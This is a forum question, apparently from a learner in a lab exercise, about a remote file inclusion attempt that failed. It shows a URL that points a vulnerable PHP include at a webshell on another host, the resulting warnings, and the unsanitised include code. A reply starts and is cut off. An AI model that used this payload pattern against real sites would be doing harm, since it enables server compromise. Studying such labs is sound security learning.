When i am trying to backdoor a web page given to me to find a specific file, upon requesting a shell i am given the following warnings on the page, and no other information is given. Should a shell pop up? I am kind of new to RFI and this is my first time working through it.
The link i used is:
http://10.102.x.x/description.php?page=http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php
The display when searching it was:
Warning: include(http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php): failed to open stream: Connection refused in /var/www/html/description.php on line 5
Warning: include(): Failed opening 'http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/description.php on line 5
description.php looks like this:
<?php
$image_name = $_GET['page'];
// Get the description from another file
include($image_name);
?>
What is the issue? I am sort of stuck.
Should i create a HTTP server to push my shell instead? I've read something about this but not sure what that entails
Even a link to an article is appreciated
I don't know how the php script looks like where you try go include the remote page, but it has to be something like: